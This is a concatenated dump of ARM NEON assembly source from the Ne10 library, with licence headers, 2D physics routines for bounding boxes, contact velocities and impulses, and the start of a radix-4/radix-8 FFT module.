        pop     {r4, r5, r6, r7}
        bx      lr
|
open-vela/external_Ne10 | 1,612 | modules/math/NE10_mulcmatvec.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mulcmatvec.asm.s
@
|
open-vela/external_Ne10 | 11,662 | modules/physics/NE10_physics.neon.s | /*
* Copyright 2014-16 ARM Limited and Contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of ARM Limited nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* NE10 Library : physics/NE10_physics.neon.s
*/
#ifdef ENABLE_NE10_PHYSICS_COMPUTE_AABB_VEC2F_NEON
.text
.syntax unified
.align 4
.global ne10_physics_compute_aabb_vertex4_vec2f_neon
.thumb
.thumb_func
ne10_physics_compute_aabb_vertex4_vec2f_neon:
/**
*@
*@ Compute the AABB for a polygon whose vertex_count is a multiple of 4.
*@ To improve performance, four vertices are processed in one loop.
*@ When vertex_count < 4*n, the missing vertices should be filled with 0.
*@
*@ void ne10_physics_compute_aabb_vertex4_vec2f_neon(ne10_mat2x2f_t *aabb,
*@ ne10_vec2f_t *vertices,
*@ ne10_mat2x2f_t *xf,
*@ ne10_vec2f_t *radius,
*@ ne10_uint32_t vertex_count);
*@
*@ r0: *aabb, returns the axis-aligned box
*@ r1: *vertices, a convex polygon
*@ r2: *xf, the position and orientation of the rigid body
*@ r3: *radius, margin subtracted from the min / added to the max corner
*@ sp: vertex_count, vertex count of the convex polygon
*@
*@ Fix (review): this routine uses q4-q7 (d8-d15), which the AAPCS
*@ requires a callee to preserve (the FFT routines in this library do
*@ vpush {q4-q7}). They are now saved/restored, and the stack offset
*@ of vertex_count is adjusted for the extra 64 bytes.
*/
push {r4, r5}
vpush {d8-d15} @ preserve callee-saved NEON regs q4-q7 per AAPCS
ldr r4, [sp, #72] @ r4 = vertex_count (8 B of r4/r5 + 64 B of d8-d15)
vld1.f32 {d30}, [r3] @ load radius into d30
vld1.f32 {d4, d5}, [r2] @ load xf into d4,d5
vdup.f32 q0, d4[0] @ broadcast xf lane 0 (presumably position x - verify layout)
vdup.f32 q1, d4[1] @ broadcast xf lane 1 (presumably position y)
@ transform vertices[0~3] by xf, then form a running min/max corner
vld2.f32 {q4, q5}, [r1]! @ load 4 vertices, de-interleaved: x->q4, y->q5
vmla.f32 q0, q4, d5[1]
vmul.f32 q6, q5, d5[1]
vmla.f32 q1, q4, d5[0]
vmul.f32 q7, q5, d5[0]
vsub.f32 q7, q0, q7
vadd.f32 q6, q1, q6
vswp.f32 d12, d15
subs r4, r4, #4 @ four vertices consumed
vmin.f32 q8, q7, q6
vpmin.f32 d24, d16, d17 @ d24 = running min corner
vmax.f32 q9, q7, q6
vpmax.f32 d25, d18, d19 @ d25 = running max corner
ble aabb_store_result @ <= 4 vertices in total: done
aabb_main_loop:
@ same transform + min/max for each further group of 4 vertices
vld2.f32 {q4, q5}, [r1]! @ load vertices
vdup.f32 q0, d4[0]
vdup.f32 q1, d4[1]
vmla.f32 q0, q4, d5[1]
vmul.f32 q6, q5, d5[1]
vmla.f32 q1, q4, d5[0]
vmul.f32 q7, q5, d5[0]
vsub.f32 q7, q0, q7
vadd.f32 q6, q1, q6
vswp.f32 d12, d15
vmin.f32 q8, q7, q6
vpmin.f32 d26, d16, d17
vmax.f32 q9, q7, q6
vpmax.f32 d27, d18, d19
subs r4, r4, #4
vmin.f32 d24, d24, d26 @ fold this group's minimum into the running min
vmax.f32 d25, d25, d27 @ fold this group's maximum into the running max
bgt aabb_main_loop
aabb_store_result:
vsub.f32 d24, d24, d30 @ lower bound -= radius
vadd.f32 d25, d25, d30 @ upper bound += radius
vst1.f32 {d24, d25}, [r0]
aabb_end:
@ return
vpop {d8-d15} @ restore callee-saved NEON regs
pop {r4, r5}
bx lr
#endif // ENABLE_NE10_PHYSICS_COMPUTE_AABB_VEC2F_NEON
#ifdef ENABLE_NE10_PHYSICS_RELATIVE_V_VEC2F_NEON
.align 4
.global ne10_physics_relative_v_vec2f_neon
.thumb
.thumb_func
ne10_physics_relative_v_vec2f_neon:
/**
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*@
*@ calculate relative velocity at contact
*@
*@
*@ ne10_result_t ne10_physics_relative_v_vec2f_neon(ne10_vec2f_t *dv,
*@ ne10_vec3f_t *v_wa,
*@ ne10_vec2f_t *ra,
*@ ne10_vec3f_t *v_wb,
*@ ne10_vec2f_t *rb,
*@ ne10_uint32_t count)
*@
*@ r0: *dv, return relative velocity
*@ r1: *v_wa, velocity and angular velocity of body a
*@ r2: *ra, distance vector from center of mass of body a to contact point
*@ r3: *v_wb, velocity and angular velocity of body b
*@ sp: *rb, distance vector from center of mass of body b to contact point
*@ sp+4: count, the number of items
*@
*@ Fix (review): d8-d10 are callee-saved under the AAPCS but were
*@ clobbered; they are now saved/restored and the stack-argument
*@ offsets adjusted for the extra 24 bytes.
*@
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*/
push {r4, r5, r6, r7}
vpush {d8-d10} @ preserve callee-saved NEON regs clobbered below
ldr r4, [sp, #40] @ r4 = *rb (16 B of r4-r7 + 24 B of d8-d10)
ldr r5, [sp, #44] @ r5 = count
and r6, r5, #1 @ r6 = count & 1 (odd leftover item)
sub r5, r5, r6 @ r5 = even part of count
cmp r5, #0
beq check_relative_v_left
relative_v_main_loop:
@ two contacts per iteration; lanes are de-interleaved by vld2/vld3
vld3.f32 {d0, d1, d2}, [r1]! @ load v_wa [va->x, va->y, wa]
vld3.f32 {d4, d5, d6}, [r3]! @ load v_wb [vb->x, vb->y, wb]
vld2.f32 {d7, d8}, [r2]! @ load ra (x lanes -> d7, y lanes -> d8)
vld2.f32 {d9, d10}, [r4]! @ load rb (x lanes -> d9, y lanes -> d10)
vmls.f32 d0, d2, d8 @ va.x - wa*ra.y
vmla.f32 d1, d2, d7 @ va.y + wa*ra.x
vmls.f32 d4, d6, d10 @ vb.x - wb*rb.y
vmla.f32 d5, d6, d9 @ vb.y + wb*rb.x
subs r5, r5, #2
vsub.f32 q10, q2, q0 @ dv = (vb + wb x rb) - (va + wa x ra)
vst2.f32 {d20, d21}, [r0]!
bgt relative_v_main_loop
check_relative_v_left:
cmp r6, #0
beq relative_v_end
relative_v_left:
@ tail: one remaining contact, processed in scalar lanes
vld3.f32 {d0[0], d1[0], d2[0]}, [r1]! @ load v_wa [va->x, va->y, wa]
vld3.f32 {d4[0], d5[0], d6[0]}, [r3]! @ load v_wb [vb->x, vb->y, wb]
vld1.f32 {d7}, [r2]! @ load ra
vld1.f32 {d8}, [r4]! @ load rb
vmls.f32 d0, d2, d7[1]
vmla.f32 d1, d2, d7[0]
vmls.f32 d4, d6, d8[1]
vmla.f32 d5, d6, d8[0]
vsub.f32 q10, q2, q0
vst2.f32 {d20[0], d21[0]}, [r0]!
relative_v_end:
@ return
vpop {d8-d10} @ restore callee-saved NEON regs
pop {r4, r5, r6, r7}
bx lr
#endif // ENABLE_NE10_PHYSICS_RELATIVE_V_VEC2F_NEON
#ifdef ENABLE_NE10_PHYSICS_APPLY_IMPULSE_VEC2F_NEON
.align 4
.global ne10_physics_apply_impulse_vec2f_neon
.thumb
.thumb_func
ne10_physics_apply_impulse_vec2f_neon:
/**
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*@
*@ apply contact impulse
*@
*@ ne10_result_t ne10_physics_apply_impulse_vec2f_neon(ne10_vec3f_t *v_wa,
*@ ne10_vec3f_t *v_wb,
*@ ne10_vec2f_t *ra,
*@ ne10_vec2f_t *rb,
*@ ne10_vec2f_t *ima,
*@ ne10_vec2f_t *imb,
*@ ne10_vec2f_t *p,
*@ ne10_uint32_t count)
*@
*@ r0: *v_wa, return velocity and angular velocity of body a
*@ r1: *v_wb, return velocity and angular velocity of body b
*@ r2: *ra, distance vector from center of mass of body a to contact point
*@ r3: *rb, distance vector from center of mass of body b to contact point
*@ sp: *ima, constant of body a
*@ sp+4: *imb, constant of body b
*@ sp+8: *p, constant
*@ sp+12: count, the number of items
*@
*@ Fix (review): d8-d10 and d12-d14 are callee-saved under the AAPCS
*@ but were clobbered; d8-d14 are now saved/restored and the stack
*@ argument offsets adjusted for the extra 56 bytes.
*@
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
**/
push {r4, r5, r6, r7}
vpush {d8-d14} @ preserve callee-saved NEON regs clobbered below
ldr r4, [sp, #72] @ r4 = *ima (16 B of r4-r7 + 56 B of d8-d14)
ldr r5, [sp, #76] @ r5 = *imb
ldr r6, [sp, #80] @ r6 = *p
ldr r7, [sp, #84] @ r7 = count
@push {r8}
and r12, r7, #1 @ r12 = count & 1 (odd leftover item)
sub r7, r7, r12
cmp r7, #0
beq check_apply_impulse_left
apply_impulse_main_loop:
@ two contacts per iteration; lanes are de-interleaved by vld2/vld3
vld2.f32 {d0, d1}, [r2]! @ load ra
vld2.f32 {d2, d3}, [r3]! @ load rb
vld2.f32 {d20, d21}, [r4]! @ load ima
vld2.f32 {d22, d23}, [r5]! @ load imb
vld2.f32 {d6, d7}, [r6]! @ load p
vld3.f32 {d8, d9, d10}, [r0] @ load v_wa
vld3.f32 {d12, d13, d14}, [r1] @ load v_wb
vmls.f32 d8, d6, d20 @ va -= p * ima[0] (presumably inverse mass - verify)
vmls.f32 d9, d7, d20
vmul.f32 d16, d0, d7 @ cross(ra, p) = ra.x*p.y - ra.y*p.x
vmls.f32 d16, d1, d6
vmls.f32 d10, d16, d21 @ wa -= cross(ra, p) * ima[1]
vmla.f32 d12, d6, d22 @ vb += p * imb[0]
vmla.f32 d13, d7, d22
vmul.f32 d16, d2, d7 @ cross(rb, p)
vmls.f32 d16, d3, d6
vmla.f32 d14, d16, d23 @ wb += cross(rb, p) * imb[1]
subs r7, r7, #2
vst3.f32 {d8, d9, d10}, [r0]!
vst3.f32 {d12, d13, d14}, [r1]!
bgt apply_impulse_main_loop
check_apply_impulse_left:
cmp r12, #0
beq apply_impulse_end
apply_impulse_left:
@ tail: one remaining contact, processed in scalar lanes
vld2.f32 {d0[0], d1[0]}, [r2]! @ load ra
vld2.f32 {d2[0], d3[0]}, [r3]! @ load rb
vld1.f32 {d4}, [r4]! @ load ima
vld1.f32 {d5}, [r5]! @ load imb
vld2.f32 {d6[0], d7[0]}, [r6]! @ load p
vld3.f32 {d8[0], d9[0], d10[0]}, [r0] @ load v_wa
vld3.f32 {d12[0], d13[0], d14[0]}, [r1] @ load v_wb
vmls.f32 d8, d6, d4[0]
vmls.f32 d9, d7, d4[0]
vmul.f32 d16, d0, d7
vmls.f32 d16, d1, d6
vmls.f32 d10, d16, d4[1]
vmla.f32 d12, d6, d5[0]
vmla.f32 d13, d7, d5[0]
vmul.f32 d16, d2, d7
vmls.f32 d16, d3, d6
vmla.f32 d14, d16, d5[1]
vst3.f32 {d8[0], d9[0], d10[0]}, [r0]!
vst3.f32 {d12[0], d13[0], d14[0]}, [r1]!
apply_impulse_end:
@ return
@pop {r8}
vpop {d8-d14} @ restore callee-saved NEON regs
pop {r4, r5, r6, r7}
bx lr
#endif // ENABLE_NE10_PHYSICS_APPLY_IMPULSE_VEC2F_NEON
|
open-vela/external_Ne10 | 31,634 | modules/dsp/NE10_fft_float32.neon.s | /*
* Copyright 2013-16 ARM Limited and Contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of ARM Limited nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* NE10 Library : dsp/NE10_fft_float32.neon.s
*/
.text
.syntax unified
/* ARM register aliases.
 * NOTE: many aliases name the same physical register (e.g. count,
 * fstride1 and nstep are all r2; fstep/mstep share r7 with p_fin0;
 * tmp0/count_m/p_fin2 share r9). Each alias is only live in the FFT
 * phase its name refers to — do not assume two aliases can be live
 * at the same time. */
p_fout .req r0
p_fin .req r1
p_factors .req r2
p_twiddles .req r3
stage_count .req r4
fstride .req r5
mstride .req r6
radix .req r12
p_fin0 .req r7
p_fin1 .req r8
p_fin2 .req r9
p_fin3 .req r10
p_tmp .req r11
count .req r2
fstride1 .req r2
fstep .req r7
p_out_ls .req r14
nstep .req r2
mstep .req r7
count_f .req r8
count_m .req r9
p_tw1 .req r10
p_in1 .req r11
p_out1 .req r12
tmp0 .req r9
/* NEON register aliases for the first stage.
 * The same q/d registers are likewise reused under several names. */
q_in0_01 .qn q0
q_in1_01 .qn q1
q_in2_01 .qn q2
q_in3_01 .qn q3
q_s0_2 .qn q4
q_s1_2 .qn q5
q_s2_2 .qn q6
q_s3_2 .qn q7
d_s1_r2 .dn d10
d_s1_i2 .dn d11
d_s3_r2 .dn d14
d_s3_i2 .dn d15
q_out0_2 .qn q8
q_out1_2 .qn q9
q_out2_2 .qn q10
q_out3_2 .qn q11
d_out1_r15 .dn d18
d_out1_i15 .dn d19
d_out3_r37 .dn d22
d_out3_i37 .dn d23
d_in0_r .dn d0
d_in0_i .dn d1
d_in1_r .dn d2
d_in1_i .dn d3
d_in2_r .dn d4
d_in2_i .dn d5
d_in3_r .dn d6
d_in3_i .dn d7
d_in4_r .dn d8
d_in4_i .dn d9
d_in5_r .dn d10
d_in5_i .dn d11
d_in6_r .dn d12
d_in6_i .dn d13
d_in7_r .dn d14
d_in7_i .dn d15
q_in0 .qn q0
q_in1 .qn q1
q_in2 .qn q2
q_in3 .qn q3
q_in4 .qn q4
q_in5 .qn q5
q_in6 .qn q6
q_in7 .qn q7
q_sin0 .qn q8
q_sin1 .qn q9
q_sin2 .qn q10
q_sin3 .qn q11
q_sin4 .qn q12
q_sin5 .qn q13
q_sin6 .qn q14
q_sin7 .qn q15
d_sin3_r .dn d22
d_sin3_i .dn d23
d_sin5_r .dn d26
d_sin5_i .dn d27
d_sin7_r .dn d30
d_sin7_i .dn d31
d_tw_twn .dn d0
d_s3_r .dn d2
d_s3_i .dn d3
d_s7_r .dn d4
d_s7_i .dn d5
q_s3 .qn q1
q_s7 .qn q2
q_s8 .qn q11
q_s9 .qn q15
q_s10 .qn q3
q_s11 .qn q4
q_s12 .qn q5
q_s13 .qn q6
q_s14 .qn q7
q_s15 .qn q0
q_out0 .qn q1
q_out1 .qn q2
q_out2 .qn q8
q_out3 .qn q9
q_out4 .qn q10
q_out5 .qn q12
q_out6 .qn q13
q_out7 .qn q14
d_s10_r .dn d6
d_s10_i .dn d7
d_s11_r .dn d8
d_s11_i .dn d9
d_s14_r .dn d14
d_s14_i .dn d15
d_s15_r .dn d0
d_s15_i .dn d1
d_out2_r .dn d16
d_out2_i .dn d17
d_out3_r .dn d18
d_out3_i .dn d19
d_out6_r .dn d26
d_out6_i .dn d27
d_out7_r .dn d28
d_out7_i .dn d29
/* NEON register aliases for the mstride loop */
d_fin0_r .dn d0
d_fin0_i .dn d1
d_fin1_r .dn d2
d_fin1_i .dn d3
d_fin2_r .dn d4
d_fin2_i .dn d5
d_fin3_r .dn d6
d_fin3_i .dn d7
d_tw0_r .dn d8
d_tw0_i .dn d9
d_tw1_r .dn d10
d_tw1_i .dn d11
d_tw2_r .dn d12
d_tw2_i .dn d13
q_fin0 .qn q0
q_scr0 .qn q15
q_scr1 .qn q7
q_scr2 .qn q8
q_scr3 .qn q9
q_scr4 .qn q10
q_scr5 .qn q11
q_scr6 .qn q12
q_scr7 .qn q13
d_scr1_r .dn d14
d_scr1_i .dn d15
d_scr2_r .dn d16
d_scr2_i .dn d17
d_scr3_r .dn d18
d_scr3_i .dn d19
d_scr5_r .dn d22
d_scr5_i .dn d23
d_scr7_r .dn d26
d_scr7_i .dn d27
q_fout0 .qn q7
q_fout2 .qn q8
q_fout1 .qn q14
q_fout3 .qn q15
d_fout0_r .dn d14
d_fout0_i .dn d15
d_fout1_r .dn d28
d_fout1_i .dn d29
d_fout2_r .dn d16
d_fout2_i .dn d17
d_fout3_r .dn d30
d_fout3_i .dn d31
d_one_by_nfft .dn d14
q_one_by_nfft .qn q9
/* Radix-4 butterfly without twiddles (first FFT stage).
 * Processes two interleaved radix-4 butterflies per expansion (two
 * complex values per q register, de-interleaved re/im by vld2).
 * The loads are software-pipelined: the NEXT iteration's inputs are
 * fetched while the current outputs are computed, so the caller must
 * pre-load q_in0_01..q_in3_01 before the first expansion.
 * \inverse == "TRUE" selects the backward (conjugate) variant. */
.macro BUTTERFLY4X2_WITHOUT_TWIDDLES inverse
vadd.f32 q_s0_2, q_in0_01, q_in2_01 @ s0 = in0 + in2
vsub.f32 q_s1_2, q_in0_01, q_in2_01 @ s1 = in0 - in2
vld2.32 {q_in0_01}, [p_fin0:64]! @ prefetch next in0
vld2.32 {q_in2_01}, [p_fin2:64]! @ prefetch next in2
vadd.f32 q_s2_2, q_in1_01, q_in3_01 @ s2 = in1 + in3
vsub.f32 q_s3_2, q_in1_01, q_in3_01 @ s3 = in1 - in3
vld2.32 {q_in1_01}, [p_fin1:64]! @ prefetch next in1
vld2.32 {q_in3_01}, [p_fin3:64]! @ prefetch next in3
vsub.f32 q_out2_2, q_s0_2, q_s2_2 @ out2 = s0 - s2
vadd.f32 q_out0_2, q_s0_2, q_s2_2 @ out0 = s0 + s2
.ifeqs "\inverse", "TRUE"
@ inverse: out1 = s1 + j*s3, out3 = s1 - j*s3
vsub.f32 d_out1_r15, d_s1_r2, d_s3_i2
vadd.f32 d_out1_i15, d_s1_i2, d_s3_r2
vadd.f32 d_out3_r37, d_s1_r2, d_s3_i2
vsub.f32 d_out3_i37, d_s1_i2, d_s3_r2
.else
@ forward: out1 = s1 - j*s3, out3 = s1 + j*s3
vadd.f32 d_out1_r15, d_s1_r2, d_s3_i2
vsub.f32 d_out1_i15, d_s1_i2, d_s3_r2
vsub.f32 d_out3_r37, d_s1_r2, d_s3_i2
vadd.f32 d_out3_i37, d_s1_i2, d_s3_r2
.endif
vtrn.32 q_out0_2, q_out1_2 @ re-interleave the two butterflies
vtrn.32 q_out2_2, q_out3_2
vst2.32 {q_out0_2}, [p_tmp]!
vst2.32 {q_out2_2}, [p_tmp]!
vst2.32 {q_out1_2}, [p_tmp]!
vst2.32 {q_out3_2}, [p_tmp]!
.endm
/* Radix-4 butterfly with twiddles (intermediate/last stages).
 * Multiplies fin1..fin3 by twiddles tw0..tw2 (conjugate twiddle when
 * \inverse == "TRUE"), then performs the radix-4 butterfly. Loads for
 * the next iteration are software-pipelined, so the caller pre-loads
 * d_fin* and d_tw* before the first expansion.
 * When \inverse and \last_stage are both "TRUE", outputs are scaled by
 * the 1/nfft value that the backward entry point left at [sp] (via
 * vpush {s0, s1}). */
.macro BUTTERFLY4X2_WITH_TWIDDLES inverse, last_stage
sub p_in1, p_in1, nstep, lsl #2 @ rewind the 4 nstep-strided input loads...
add p_in1, p_in1, #16 @ ...and step to the next 2 complex columns
sub p_tw1, p_tw1, mstep, lsl #1 @ rewind the 2 mstep post-increments...
add p_tw1, p_tw1, #16 @ ...and step the twiddle pointer likewise
vmov q_scr0, q_fin0
vmul.f32 d_scr1_r, d_fin1_r, d_tw0_r @ complex mul: fin1 * tw0 ...
vmul.f32 d_scr1_i, d_fin1_i, d_tw0_r
vmul.f32 d_scr2_r, d_fin2_r, d_tw1_r @ ... fin2 * tw1 ...
vmul.f32 d_scr2_i, d_fin2_i, d_tw1_r
vmul.f32 d_scr3_r, d_fin3_r, d_tw2_r @ ... fin3 * tw2
vmul.f32 d_scr3_i, d_fin3_i, d_tw2_r
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep @ prefetch next fin0
.ifeqs "\inverse", "TRUE"
@ inverse: multiply by the conjugated twiddle
vmla.f32 d_scr1_r, d_fin1_i, d_tw0_i
vmls.f32 d_scr1_i, d_fin1_r, d_tw0_i
vmla.f32 d_scr2_r, d_fin2_i, d_tw1_i
vmls.f32 d_scr2_i, d_fin2_r, d_tw1_i
vmla.f32 d_scr3_r, d_fin3_i, d_tw2_i
vmls.f32 d_scr3_i, d_fin3_r, d_tw2_i
.else
vmls.f32 d_scr1_r, d_fin1_i, d_tw0_i
vmla.f32 d_scr1_i, d_fin1_r, d_tw0_i
vmls.f32 d_scr2_r, d_fin2_i, d_tw1_i
vmla.f32 d_scr2_i, d_fin2_r, d_tw1_i
vmls.f32 d_scr3_r, d_fin3_i, d_tw2_i
vmla.f32 d_scr3_i, d_fin3_r, d_tw2_i
.endif
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep @ prefetch next inputs/twiddles
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
vadd.f32 q_scr4, q_scr0, q_scr2 @ radix-4 combine of the twiddled inputs
vsub.f32 q_scr5, q_scr0, q_scr2
vadd.f32 q_scr6, q_scr1, q_scr3
vsub.f32 q_scr7, q_scr1, q_scr3
.ifeqs "\inverse", "TRUE"
.ifeqs "\last_stage", "TRUE"
vld1.32 {d_one_by_nfft}, [sp] @ 1/nfft pushed by the backward entry point
vdup.32 q_one_by_nfft, d_one_by_nfft[0]
.endif
.endif
vadd.f32 q_fout0, q_scr4, q_scr6
vsub.f32 q_fout2, q_scr4, q_scr6
.ifeqs "\inverse", "TRUE"
vsub.f32 d_fout1_r, d_scr5_r, d_scr7_i
vadd.f32 d_fout1_i, d_scr5_i, d_scr7_r
vadd.f32 d_fout3_r, d_scr5_r, d_scr7_i
vsub.f32 d_fout3_i, d_scr5_i, d_scr7_r
.else
vadd.f32 d_fout1_r, d_scr5_r, d_scr7_i
vsub.f32 d_fout1_i, d_scr5_i, d_scr7_r
vsub.f32 d_fout3_r, d_scr5_r, d_scr7_i
vadd.f32 d_fout3_i, d_scr5_i, d_scr7_r
.endif
.ifeqs "\inverse", "TRUE"
.ifeqs "\last_stage", "TRUE"
@ final backward stage: normalise the outputs by 1/nfft
vmul.f32 q_fout0, q_fout0, q_one_by_nfft
vmul.f32 q_fout2, q_fout2, q_one_by_nfft
vmul.f32 q_fout1, q_fout1, q_one_by_nfft
vmul.f32 q_fout3, q_fout3, q_one_by_nfft
.endif
.endif
vst2.32 {d_fout0_r, d_fout0_i}, [p_out1], mstep
vst2.32 {d_fout1_r, d_fout1_i}, [p_out1], mstep
vst2.32 {d_fout2_r, d_fout2_i}, [p_out1], mstep
vst2.32 {d_fout3_r, d_fout3_i}, [p_out1], mstep
sub p_out1, p_out1, mstep, lsl #2 @ rewind the 4 strided stores...
add p_out1, p_out1, #16 @ ...and advance to the next 2 columns
.endm
/* Radix-8 butterfly without twiddles (first stage when radix == 8).
 * Built from radix-4 sub-butterflies plus radix-2 combines; the only
 * non-trivial twiddles, +/-1/sqrt(2), are loaded from .L_TW_81.
 * \inverse == "TRUE" selects the backward (conjugate) variant. */
.macro BUTTERFLY8X2_WITHOUT_TWIDDLES inverse
/**
* q_in0: Fin1[0]
* q_in1: Fin1[0 + fstride]
* q_in2: Fin1[fstride1]
* q_in3: Fin1[fstride1 + fstride]
* q_in4: Fin1[fstride1*2]
* q_in5: Fin1[fstride1*2 + fstride]
* q_in6: Fin1[fstride1*3]
* q_in7: Fin1[fstride1*3 + fstride]
*
*/
adr tmp0, .L_TW_81 @ address of the +/-1/sqrt(2) constant pair
vld2.32 {d_in0_r, d_in0_i}, [p_in1:64], fstep
vld2.32 {d_in2_r, d_in2_i}, [p_in1:64], fstep
vld2.32 {d_in4_r, d_in4_i}, [p_in1:64], fstep
vld2.32 {d_in6_r, d_in6_i}, [p_in1:64], fstep
vld2.32 {d_in1_r, d_in1_i}, [p_in1:64], fstep
vld2.32 {d_in3_r, d_in3_i}, [p_in1:64], fstep
vld2.32 {d_in5_r, d_in5_i}, [p_in1:64], fstep
vld2.32 {d_in7_r, d_in7_i}, [p_in1:64], fstep
/* radix 4 butterfly without twiddles */
vadd.f32 q_sin0, q_in0, q_in1
vsub.f32 q_sin1, q_in0, q_in1
vld1.32 {d_tw_twn}, [tmp0] @ d_tw_twn = {1/sqrt(2), -1/sqrt(2)}
vadd.f32 q_sin2, q_in2, q_in3
vsub.f32 q_sin3, q_in2, q_in3
vadd.f32 q_sin4, q_in4, q_in5
vsub.f32 q_sin5, q_in4, q_in5
vadd.f32 q_sin6, q_in6, q_in7
vsub.f32 q_sin7, q_in6, q_in7
.ifeqs "\inverse", "TRUE"
@ inverse: rotate sin5 by +j (neg + swap) and pre-rotate sin3/sin7
vneg.f32 d_sin5_i, d_sin5_i
vsub.f32 d_s3_r, d_sin3_r, d_sin3_i
vadd.f32 d_s3_i, d_sin3_i, d_sin3_r
vadd.f32 d_s7_r, d_sin7_r, d_sin7_i
vsub.f32 d_s7_i, d_sin7_i, d_sin7_r
.else
@ forward: rotate sin5 by -j (neg + swap) and pre-rotate sin3/sin7
vneg.f32 d_sin5_r, d_sin5_r
vadd.f32 d_s3_r, d_sin3_r, d_sin3_i
vsub.f32 d_s3_i, d_sin3_i, d_sin3_r
vsub.f32 d_s7_r, d_sin7_r, d_sin7_i
vadd.f32 d_s7_i, d_sin7_i, d_sin7_r
.endif
vswp d_sin5_r, d_sin5_i
vmul.f32 q_s3, q_s3, d_tw_twn[0] @ scale by 1/sqrt(2)
